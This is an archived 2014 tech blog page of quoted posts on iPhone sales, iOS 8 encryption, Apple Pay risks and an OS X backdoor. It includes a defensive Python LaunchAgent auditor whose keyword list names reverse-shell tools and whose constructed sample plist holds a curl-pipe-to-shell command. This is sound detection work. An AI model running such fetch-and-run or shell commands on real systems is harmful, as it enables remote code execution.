Archive for September 2014

Historical Look at iPhone Launch Sales [Chart]

Apple today announced 10 million iPhone 6 and iPhone 6 Plus sales on launch weekend. Here’s a historical look at launch sales for every iPhone released.

via iClarified – Apple News – Historical Look at iPhone Launch Sales [Chart].

I am also curious how these numbers are restricted by availability.

Customers Are Better Strategists Than Managers

It was after I left that job and started working as a consultant that the penny finally dropped: I realized I’d been looking at the business from the inside out. From that perspective, all I could see was the activity that consumed my day. I also realized that customers and other stakeholders have the opposite perspective. Their view is outside-in, and that’s what makes them good strategists.

via Customers Are Better Strategists Than Managers – Graham Kenny – Harvard Business Review.

iPhone 6: Preliminary Results

As one can see, it seems that Apple has managed to do something quite incredible with battery life. Normally an 1810 mAh battery with 3.82V nominal voltage would be quite a poor performer, but the iPhone 6 is a step above just about every other Android smartphone on the market.

via AnandTech | iPhone 6 and iPhone 6 Plus: Preliminary Results.

Apple Cannot Decrypt iPhones Running iOS 8 for Law Enforcement

By setting up a device passcode, the user automatically enables Data Protection. iOS supports four-digit and arbitrary-length alphanumeric passcodes. In addition to unlocking the device, a passcode provides entropy for certain encryption keys. This means an attacker in possession of a device can’t get access to data in specific protection classes without the passcode.

The passcode is entangled with the device’s UID, so brute-force attempts must be performed on the device under attack. A large iteration count is used to make each attempt slower. The iteration count is calibrated so that one attempt takes approximately 80 milliseconds. This means it would take more than 5½ years to try all combinations of a six-character alphanumeric passcode with lowercase letters and numbers.

The stronger the user passcode is, the stronger the encryption key becomes. Touch ID can be used to enhance this equation by enabling the user to establish a much stronger passcode than would otherwise be practical. This increases the effective amount of entropy protecting the encryption keys used for Data Protection, without adversely affecting the user experience of unlocking an iOS device multiple times throughout the day.

To further discourage brute-force passcode attacks, the iOS interface enforces escalating time delays after the entry of an invalid passcode at the Lock screen. Users can choose to have the device automatically wiped if the passcode is entered incorrectly after 10 consecutive attempts. This setting is also available as an administrative policy through mobile device management (MDM) and Exchange ActiveSync, and can be set to a lower threshold.

On a device with an A7 or later A-series processor, the key operations are performed by the Secure Enclave, which also enforces a 5-second delay between repeated failed unlocking requests. This provides a governor against brute-force attacks in addition to safeguards enforced by iOS.

http://images.apple.com/privacy/docs/iOS_Security_Guide_Sept_2014.pdf

On devices running iOS 8, your personal data such as photos, messages (including attachments), email, contacts, call history, iTunes content, notes, and reminders is placed under the protection of your passcode. Unlike our competitors, Apple cannot bypass your passcode and therefore cannot access this data. So it’s not technically feasible for us to respond to government warrants for the extraction of this data from devices in their possession running iOS 8.

OSXAuditor

OS X Auditor is a free Mac OS X computer forensics tool.

OS X Auditor parses and hashes the following artifacts on the running system or a copy of a system you want to analyze:

  • the kernel extensions
  • the system agents and daemons
  • the third party’s agents and daemons
  • the old and deprecated system and third party’s startup items
  • the users’ agents
  • the users’ downloaded files
  • the installed applications

It extracts:

  • the users’ quarantined files
  • the users’ Safari history, downloads, topsites, LastSession, HTML5 databases and localstore
  • the users’ Firefox cookies, downloads, formhistory, permissions, places and signons
  • the users’ Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage
  • the users’ social and email accounts
  • the WiFi access points the audited system has been connected to (and tries to geolocate them)

It also looks for suspicious keywords in the .plist files themselves.

via jipegit/OSXAuditor.

Apple (AAPL) Back Above the $600 Billion Mark


After moving back above the $100/share level today, Apple (AAPL) is back over the $600 billion mark as well.  This puts it nearly $180 billion larger than Exxon Mobil (XOM), the next largest company in the US.  The difference in market cap between Apple and Exxon is equivalent to the size of AT&T, the 19th largest company in the country!

via Bespoke Investment Group – Think BIG – Apple (AAPL) Back Above the $600 Billion Mark; Two Tech Stocks Creep Up on Exxon Mobil.

iPhone Fragmentation begins

With the announcements this week, Apple now sells iOS devices at the following sizes:

  • 4″ (iPhone 5c and iPhone 5S)
  • 4.7″ (iPhone 6)
  • 5.5″ (iPhone 6 Plus)
  • 7.9″ (iPad mini with Retina display and iPad mini)
  • 9.7″ (iPad Air and iPad with Retina display)

This graphic — by the wonderful Underscore David Smith — shows all of this visually.

It’s clear Apple’s trying to make a smooth range of device sizes. With rumors of a larger iPad floating around, this trend may only continue.

via Plus or minus — 512 Pixels.

How Safe Can Apple Pay Really Be?

The most worrisome point of vulnerability in an Apple Pay transaction, however, is the NFC transmission itself. Bestuzhev said that NFC transmissions are just like any other data transfer. “It sends and receives information which can be intercepted,” he said.

This has been proven. A couple of years ago a former NSA analyst turned white hat hacker found a couple of really serious vulnerabilities in the NFC system. At the Black Hat conference, he demonstrated to a live audience how he could hijack an NFC-enabled device by simply waving a tag with an embedded NFC chip inside of it. The same kind of tag could also be used to send someone’s browser to a URL address, perhaps one that downloads malware onto the phone.

These aren’t problems specific to Apple Pay; you run the same risk with Google Wallet, Softcard, or any other mobile payment plan that relies on NFC. And while Apple has taken some steps to protect against that—including assigning unique codes to every transaction—there’s only so much you can do when the fundamental technology is vulnerable.

via How Safe Can Apple Pay Really Be?.

Cyberespionage group ports Windows backdoor to Mac OS X

“The backdoor code was ported to OS X from a Windows backdoor that has been used extensively in targeted attacks over the past several years, having been updated many times in the process,” security researchers from FireEye said Thursday in a blog post.

The malicious program is dubbed XSLCmd and is capable of opening a reverse shell, listing and transferring files and installing additional malware on an infected computer. The OS X variant can also log keystrokes and capture screen shots, the FireEye researchers said.

When installed on a Mac the malware copies itself to /Library/Logs/clipboardd and $HOME/Library/LaunchAgents/clipboardd. It also creates a com.apple.service.clipboardd.plist file to ensure its execution after system reboots.

The malware contains code that checks the OS X version, but does not account for versions above 10.8 (Mountain Lion). This suggests that version 10.8 was either the latest OS X version when the program was written or at least the most common one used by its intended targets.

The XSLCmd backdoor was created and is used by a cyberespionage group that has been operating since at least 2009 and has been dubbed GREF by the FireEye researchers. “Historically, GREF has targeted a wide range of organizations including the US Defense Industrial Base (DIB), electronics and engineering companies worldwide, as well as foundations and other NGOs, especially those with interests in Asia,” they said.

via Cyberespionage group starts ports Windows backdoor to Mac OS X | Macworld.
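The OSXAuditor excerpt earlier on this page lists launch agents and daemons among the artifacts it parses and hashes, and the FireEye summary above gives a concrete reason why: XSLCmd persists as a user LaunchAgent with an Apple-looking label whose binary lives under /Library/Logs. As an added example (written for this post; it is neither OSXAuditor's code nor FireEye's, and does not reproduce OSXAuditor's keyword list), the script below does that one slice of the job: it parses every launchd plist in a directory, records a SHA-256 of the plist and of the executable if present, and applies three rules of my own choosing based on the indicators in the write-up. The three sample plists it runs against are constructed and written to a temporary directory, so it runs on any OS without a Mac to audit.

```python
"""LaunchAgent/LaunchDaemon audit: parse, hash, and flag launchd jobs.
Example code for this post; rules and keyword list are this example's own,
derived from the XSLCmd indicators above, not OSXAuditor's actual logic."""
import hashlib
import os
import plistlib
import tempfile

APPLE_LABEL_PREFIX = "com.apple."
# Directories Apple never uses for executables (assumption: tuned to the write-up).
ODD_PROGRAM_DIRS = ("/Library/Logs/", "/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
# Keywords worth a second look when they appear inside a plist (this example's list).
SUSPICIOUS_KEYWORDS = (b"/dev/tcp", b"nc -e", b"bash -i", b"curl ", b"wget ", b"python -c")


def sha256_file(path):
    """Stream a file through SHA-256 so large binaries are hashed without loading them."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def program_of(job):
    """launchd names the executable in Program, or else as ProgramArguments[0]."""
    if job.get("Program"):
        return job["Program"]
    args = job.get("ProgramArguments") or []
    return args[0] if args else None


def audit_launch_dir(directory, user_scope):
    """Parse and hash every .plist in a LaunchAgents/LaunchDaemons directory.

    user_scope=True means the directory belongs to a user (~/Library/LaunchAgents),
    where an Apple-namespaced label has no legitimate reason to appear.
    Returns one finding dict per plist that trips at least one rule.
    """
    findings = []
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        path = os.path.join(directory, name)
        record = {"plist": path, "plist_sha256": sha256_file(path), "reasons": []}
        try:
            with open(path, "rb") as f:
                raw = f.read()
            job = plistlib.loads(raw)
        except Exception as exc:  # a plist launchd cannot read is itself a finding
            record["reasons"].append(f"unparseable plist: {exc}")
            findings.append(record)
            continue
        label = job.get("Label", "")
        program = program_of(job)
        record["label"] = label
        record["program"] = program
        if user_scope and label.startswith(APPLE_LABEL_PREFIX):
            record["reasons"].append("Apple-namespaced label in a user LaunchAgents directory")
        if program and program.startswith(ODD_PROGRAM_DIRS):
            record["reasons"].append(f"executable lives in an unusual location: {program}")
        hits = [k.decode() for k in SUSPICIOUS_KEYWORDS if k in raw]
        if hits:
            record["reasons"].append("suspicious keywords in plist: " + ", ".join(hits))
        # Hash the executable too when it exists on the audited volume.
        record["program_sha256"] = sha256_file(program) if program and os.path.isfile(program) else None
        if record["reasons"]:
            findings.append(record)
    return findings


def build_sample_dir():
    """Constructed sample input: three LaunchAgent plists in a temporary directory."""
    d = tempfile.mkdtemp(prefix="launchagents-")
    jobs = {
        # Mirrors the persistence the XSLCmd summary describes.
        "com.apple.service.clipboardd.plist": {
            "Label": "com.apple.service.clipboardd",
            "ProgramArguments": ["/Library/Logs/clipboardd"],
            "RunAtLoad": True,
        },
        # Constructed: a shell one-liner that pulls a script off the network.
        "com.example.updater.plist": {
            "Label": "com.example.updater",
            "ProgramArguments": ["/bin/sh", "-c", "curl -s http://updates.example.com/a.sh | sh"],
            "RunAtLoad": True,
        },
        # Constructed: an unremarkable third-party agent that should not be flagged.
        "com.example.sync.plist": {
            "Label": "com.example.sync",
            "ProgramArguments": ["/usr/local/bin/sync-agent", "--daemon"],
            "KeepAlive": True,
        },
    }
    for name, job in jobs.items():
        with open(os.path.join(d, name), "wb") as f:
            plistlib.dump(job, f)
    return d


if __name__ == "__main__":
    for finding in audit_launch_dir(build_sample_dir(), user_scope=True):
        print(finding["plist"], finding["plist_sha256"][:16])
        for reason in finding["reasons"]:
            print("   -", reason)
```

Point it at a real ~/Library/LaunchAgents with user_scope=True, or at /Library/LaunchDaemons with user_scope=False, and the Apple-label rule switches off for the system directory where com.apple.* labels are expected; the odd-directory and keyword rules stay on. On an imaged disk rather than a live system, pass the mounted path and the program hashes are taken from the image, which is the "copy of a system you want to analyze" case the OSXAuditor excerpt mentions.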

What’s wrong with your website?

Not much.

In real life, it’s not unusual for one in four people who walk into your store to buy from you. Not unusual for every friend you call on the phone to have an actual conversation with you. Not surprising that most people you ask on a date say yes, or at least politely decline.

In direct mail, you’re doing well if only 99 people out of a hundred say no. Not 25%, but 1% success.

Online, though, the numbers are far worse. It’s not unusual for a thousand people to visit your website before someone buys something. It’s not news if you ask 5,000 Twitter followers to do something and they all refuse to take action.

Too much noise, too many choices, and most of all, too many people asking for everything, all the time.

People won’t click all the things they can click, ever. They won’t get three or four or nine clicks into your site no matter how responsive, webkitted and user tested your site is.

Sure, you can probably make it better.

Someone who’s really good at it can probably make it measurably better.

But don’t beat yourself up that it’s not converting. By real-life definitions, nothing online converts.

The secret is maximizing the things that can’t work in real life. The viral effects, the upside of remarkable products and services, the horizontal movement of ideas, from person to person, not from you to the market.

via Seth’s Blog: What’s wrong with your website?.